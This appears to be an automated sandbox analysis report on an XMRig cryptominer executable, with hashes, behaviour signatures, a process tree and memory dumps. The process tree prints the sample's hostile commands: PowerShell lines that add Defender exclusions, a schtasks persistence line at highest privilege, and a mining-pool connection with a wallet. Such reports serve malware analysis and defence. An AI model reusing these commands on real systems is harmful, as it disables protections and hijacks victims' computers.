Analysis

  • max time kernel
    62s
  • max time network
    66s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    18/12/2022, 07:49

General

  • Target

    2637eb34ee0e5131f80452b12bbdddba.exe

  • Size

    2.0MB

  • MD5

    2637eb34ee0e5131f80452b12bbdddba

  • SHA1

    39305d513cffc1bf6b8a20cdd912532ade05a7ed

  • SHA256

    9e6f702e49e2effdc3470632184a8ceb8bcd1eb60b85293114ce61fef8f8b4c7

  • SHA512

    0b58c9bf00dafb5b3474da0cf7c8bac45ed8f3ebefbea161c468b87c37d43a904144f56a9c771c519258c17fc7ee8faea129fd3cb7dc8113fa87c113d425ee4b

  • SSDEEP

    49152:cpFtPeFTefWNTt0dYMuZDGmA9MUy41+hrDy:cpWeulpZa/l1m2

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2637eb34ee0e5131f80452b12bbdddba.exe
    "C:\Users\Admin\AppData\Local\Temp\2637eb34ee0e5131f80452b12bbdddba.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1536
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:568
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp366D.tmp.bat""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1368
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:1708
      • C:\ProgramData\cloud\GAPOSUR.exe
        "C:\ProgramData\cloud\GAPOSUR.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:564
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:912
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:344
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GAPOSUR" /tr "C:\ProgramData\cloud\GAPOSUR.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1412
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GAPOSUR" /tr "C:\ProgramData\cloud\GAPOSUR.exe"
            5⤵
            • Creates scheduled task(s)
            PID:2024
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:2008

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\cloud\GAPOSUR.exe

          Filesize

          2.0MB

          MD5

          2637eb34ee0e5131f80452b12bbdddba

          SHA1

          39305d513cffc1bf6b8a20cdd912532ade05a7ed

          SHA256

          9e6f702e49e2effdc3470632184a8ceb8bcd1eb60b85293114ce61fef8f8b4c7

          SHA512

          0b58c9bf00dafb5b3474da0cf7c8bac45ed8f3ebefbea161c468b87c37d43a904144f56a9c771c519258c17fc7ee8faea129fd3cb7dc8113fa87c113d425ee4b

        • C:\ProgramData\cloud\GAPOSUR.exe

          Filesize

          2.0MB

          MD5

          2637eb34ee0e5131f80452b12bbdddba

          SHA1

          39305d513cffc1bf6b8a20cdd912532ade05a7ed

          SHA256

          9e6f702e49e2effdc3470632184a8ceb8bcd1eb60b85293114ce61fef8f8b4c7

          SHA512

          0b58c9bf00dafb5b3474da0cf7c8bac45ed8f3ebefbea161c468b87c37d43a904144f56a9c771c519258c17fc7ee8faea129fd3cb7dc8113fa87c113d425ee4b

        • C:\Users\Admin\AppData\Local\Temp\tmp366D.tmp.bat

          Filesize

          141B

          MD5

          11b043cb8cd71726676606956c70378f

          SHA1

          a5f58ea44c18d9f7681857c4f21f840d029e9675

          SHA256

          61363e00b03c592ac6ec4278948a7121a15f6df7d77d5e3fd0571bca795414c4

          SHA512

          43a7959fd4feb441d4565cff07a5c64e32cf3392c40314d58bebc34138f0b06990097a99ffa8cd66c3c9b4dd11163dcf170961b8a1c69240a891273adc6e5332

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          e7dcd864ccebbadc74d1c7daa2635e39

          SHA1

          2b4af779d5397db778c8fa8be2d8d9d4888e6188

          SHA256

          a57b4db14443d0c0012347f2280891a19d55d5ae663d58fc2fe3589cdaa9ab6c

          SHA512

          b867d60afdb25db29587396b31486b0243b30c5d50136833c4e015bf5fc2b758e1ef5e3749d1747805886966a69c2c5b78791e158141448c9d53ae89a608e011

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          e7dcd864ccebbadc74d1c7daa2635e39

          SHA1

          2b4af779d5397db778c8fa8be2d8d9d4888e6188

          SHA256

          a57b4db14443d0c0012347f2280891a19d55d5ae663d58fc2fe3589cdaa9ab6c

          SHA512

          b867d60afdb25db29587396b31486b0243b30c5d50136833c4e015bf5fc2b758e1ef5e3749d1747805886966a69c2c5b78791e158141448c9d53ae89a608e011

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          e7dcd864ccebbadc74d1c7daa2635e39

          SHA1

          2b4af779d5397db778c8fa8be2d8d9d4888e6188

          SHA256

          a57b4db14443d0c0012347f2280891a19d55d5ae663d58fc2fe3589cdaa9ab6c

          SHA512

          b867d60afdb25db29587396b31486b0243b30c5d50136833c4e015bf5fc2b758e1ef5e3749d1747805886966a69c2c5b78791e158141448c9d53ae89a608e011

        • \ProgramData\cloud\GAPOSUR.exe

          Filesize

          2.0MB

          MD5

          2637eb34ee0e5131f80452b12bbdddba

          SHA1

          39305d513cffc1bf6b8a20cdd912532ade05a7ed

          SHA256

          9e6f702e49e2effdc3470632184a8ceb8bcd1eb60b85293114ce61fef8f8b4c7

          SHA512

          0b58c9bf00dafb5b3474da0cf7c8bac45ed8f3ebefbea161c468b87c37d43a904144f56a9c771c519258c17fc7ee8faea129fd3cb7dc8113fa87c113d425ee4b

        • memory/344-125-0x00000000025D4000-0x00000000025D7000-memory.dmp

          Filesize

          12KB

        • memory/344-152-0x00000000025D4000-0x00000000025D7000-memory.dmp

          Filesize

          12KB

        • memory/344-153-0x00000000025DB000-0x00000000025FA000-memory.dmp

          Filesize

          124KB

        • memory/344-119-0x000007FEED900000-0x000007FEEE323000-memory.dmp

          Filesize

          10.1MB

        • memory/344-121-0x000007FEEBE50000-0x000007FEEC9AD000-memory.dmp

          Filesize

          11.4MB

        • memory/344-131-0x000000001B850000-0x000000001BB4F000-memory.dmp

          Filesize

          3.0MB

        • memory/344-137-0x00000000025D4000-0x00000000025D7000-memory.dmp

          Filesize

          12KB

        • memory/564-111-0x000007FEFB710000-0x000007FEFB925000-memory.dmp

          Filesize

          2.1MB

        • memory/564-91-0x0000000000490000-0x00000000004D3000-memory.dmp

          Filesize

          268KB

        • memory/564-183-0x0000000000940000-0x0000000000B9E000-memory.dmp

          Filesize

          2.4MB

        • memory/564-136-0x000007FEFC930000-0x000007FEFC947000-memory.dmp

          Filesize

          92KB

        • memory/564-134-0x000007FEFCA80000-0x000007FEFCAA2000-memory.dmp

          Filesize

          136KB

        • memory/564-157-0x000007FEFC750000-0x000007FEFC7AB000-memory.dmp

          Filesize

          364KB

        • memory/564-144-0x000007FEF9450000-0x000007FEF94B4000-memory.dmp

          Filesize

          400KB

        • memory/564-129-0x0000000000940000-0x0000000000B9E000-memory.dmp

          Filesize

          2.4MB

        • memory/564-130-0x0000000000490000-0x00000000004D3000-memory.dmp

          Filesize

          268KB

        • memory/564-156-0x000007FEFD490000-0x000007FEFD4C6000-memory.dmp

          Filesize

          216KB

        • memory/564-143-0x000007FEFE0E0000-0x000007FEFE12D000-memory.dmp

          Filesize

          308KB

        • memory/564-142-0x000007FEF1080000-0x000007FEF10E2000-memory.dmp

          Filesize

          392KB

        • memory/564-155-0x000007FEFAA00000-0x000007FEFAA27000-memory.dmp

          Filesize

          156KB

        • memory/564-120-0x000007FEFD4D0000-0x000007FEFD4EF000-memory.dmp

          Filesize

          124KB

        • memory/564-90-0x0000000000940000-0x0000000000B9E000-memory.dmp

          Filesize

          2.4MB

        • memory/564-117-0x000007FEFDC00000-0x000007FEFDCD7000-memory.dmp

          Filesize

          860KB

        • memory/564-141-0x000007FEF1060000-0x000007FEF107C000-memory.dmp

          Filesize

          112KB

        • memory/564-92-0x000007FEFB0A0000-0x000007FEFB10F000-memory.dmp

          Filesize

          444KB

        • memory/564-93-0x000007FEFAEF0000-0x000007FEFAF8C000-memory.dmp

          Filesize

          624KB

        • memory/564-94-0x000007FEFF4B0000-0x000007FEFF517000-memory.dmp

          Filesize

          412KB

        • memory/564-95-0x00000000770D0000-0x00000000771CA000-memory.dmp

          Filesize

          1000KB

        • memory/564-96-0x000007FEFE040000-0x000007FEFE0DF000-memory.dmp

          Filesize

          636KB

        • memory/564-97-0x00000000771D0000-0x00000000772EF000-memory.dmp

          Filesize

          1.1MB

        • memory/564-98-0x000007FEFD400000-0x000007FEFD46C000-memory.dmp

          Filesize

          432KB

        • memory/564-99-0x000007FEFDE60000-0x000007FEFDED1000-memory.dmp

          Filesize

          452KB

        • memory/564-100-0x000007FEF6960000-0x000007FEF6A57000-memory.dmp

          Filesize

          988KB

        • memory/564-101-0x000007FEFF520000-0x000007FEFF5FB000-memory.dmp

          Filesize

          876KB

        • memory/564-102-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp

          Filesize

          9.9MB

        • memory/564-104-0x000007FEFD9F0000-0x000007FEFDBF3000-memory.dmp

          Filesize

          2.0MB

        • memory/564-103-0x000007FEFE190000-0x000007FEFE2BD000-memory.dmp

          Filesize

          1.2MB

        • memory/564-105-0x0000000000940000-0x0000000000B9E000-memory.dmp

          Filesize

          2.4MB

        • memory/564-106-0x000007FEFADC0000-0x000007FEFAEEC000-memory.dmp

          Filesize

          1.2MB

        • memory/564-154-0x000007FEFCF00000-0x000007FEFCF25000-memory.dmp

          Filesize

          148KB

        • memory/564-145-0x000007FEF9500000-0x000007FEF9571000-memory.dmp

          Filesize

          452KB

        • memory/568-148-0x00000000029BB000-0x00000000029DA000-memory.dmp

          Filesize

          124KB

        • memory/568-78-0x000007FEED900000-0x000007FEEE323000-memory.dmp

          Filesize

          10.1MB

        • memory/568-138-0x00000000029B4000-0x00000000029B7000-memory.dmp

          Filesize

          12KB

        • memory/568-122-0x000007FEEBE50000-0x000007FEEC9AD000-memory.dmp

          Filesize

          11.4MB

        • memory/568-147-0x00000000029B4000-0x00000000029B7000-memory.dmp

          Filesize

          12KB

        • memory/568-126-0x00000000029B4000-0x00000000029B7000-memory.dmp

          Filesize

          12KB

        • memory/592-123-0x000007FEEBE50000-0x000007FEEC9AD000-memory.dmp

          Filesize

          11.4MB

        • memory/592-146-0x0000000002A34000-0x0000000002A37000-memory.dmp

          Filesize

          12KB

        • memory/592-149-0x0000000002A3B000-0x0000000002A5A000-memory.dmp

          Filesize

          124KB

        • memory/592-135-0x000000001B830000-0x000000001BB2F000-memory.dmp

          Filesize

          3.0MB

        • memory/592-79-0x000007FEED900000-0x000007FEEE323000-memory.dmp

          Filesize

          10.1MB

        • memory/592-127-0x0000000002A34000-0x0000000002A37000-memory.dmp

          Filesize

          12KB

        • memory/592-74-0x000007FEFBB71000-0x000007FEFBB73000-memory.dmp

          Filesize

          8KB

        • memory/592-139-0x0000000002A34000-0x0000000002A37000-memory.dmp

          Filesize

          12KB

        • memory/912-132-0x000000001B710000-0x000000001BA0F000-memory.dmp

          Filesize

          3.0MB

        • memory/912-150-0x0000000002904000-0x0000000002907000-memory.dmp

          Filesize

          12KB

        • memory/912-140-0x0000000002904000-0x0000000002907000-memory.dmp

          Filesize

          12KB

        • memory/912-124-0x000007FEEBE50000-0x000007FEEC9AD000-memory.dmp

          Filesize

          11.4MB

        • memory/912-128-0x0000000002904000-0x0000000002907000-memory.dmp

          Filesize

          12KB

        • memory/912-151-0x000000000290B000-0x000000000292A000-memory.dmp

          Filesize

          124KB

        • memory/912-118-0x000007FEED900000-0x000007FEEE323000-memory.dmp

          Filesize

          10.1MB

        • memory/1536-65-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

          Filesize

          9.9MB

        • memory/1536-58-0x00000000770D0000-0x00000000771CA000-memory.dmp

          Filesize

          1000KB

        • memory/1536-84-0x0000000000C60000-0x0000000000CA3000-memory.dmp

          Filesize

          268KB

        • memory/1536-83-0x00000000010A0000-0x00000000012FE000-memory.dmp

          Filesize

          2.4MB

        • memory/1536-82-0x000007FEFD4D0000-0x000007FEFD4EF000-memory.dmp

          Filesize

          124KB

        • memory/1536-56-0x000007FEFAEF0000-0x000007FEFAF8C000-memory.dmp

          Filesize

          624KB

        • memory/1536-71-0x000007FEF6930000-0x000007FEF6A5C000-memory.dmp

          Filesize

          1.2MB

        • memory/1536-70-0x00000000010A0000-0x00000000012FE000-memory.dmp

          Filesize

          2.4MB

        • memory/1536-69-0x000007FEFD9F0000-0x000007FEFDBF3000-memory.dmp

          Filesize

          2.0MB

        • memory/1536-66-0x000007FEFE190000-0x000007FEFE2BD000-memory.dmp

          Filesize

          1.2MB

        • memory/1536-68-0x0000000000C60000-0x0000000000CA3000-memory.dmp

          Filesize

          268KB

        • memory/1536-63-0x000007FEFADF0000-0x000007FEFAEE7000-memory.dmp

          Filesize

          988KB

        • memory/1536-55-0x000007FEFB0A0000-0x000007FEFB10F000-memory.dmp

          Filesize

          444KB

        • memory/1536-64-0x000007FEFF520000-0x000007FEFF5FB000-memory.dmp

          Filesize

          876KB

        • memory/1536-67-0x00000000010A0000-0x00000000012FE000-memory.dmp

          Filesize

          2.4MB

        • memory/1536-62-0x000007FEFDE60000-0x000007FEFDED1000-memory.dmp

          Filesize

          452KB

        • memory/1536-61-0x000007FEFD400000-0x000007FEFD46C000-memory.dmp

          Filesize

          432KB

        • memory/1536-60-0x00000000771D0000-0x00000000772EF000-memory.dmp

          Filesize

          1.1MB

        • memory/1536-59-0x000007FEFE040000-0x000007FEFE0DF000-memory.dmp

          Filesize

          636KB

        • memory/1536-57-0x000007FEFF4B0000-0x000007FEFF517000-memory.dmp

          Filesize

          412KB

        • memory/2008-158-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/2008-159-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/2008-161-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/2008-182-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB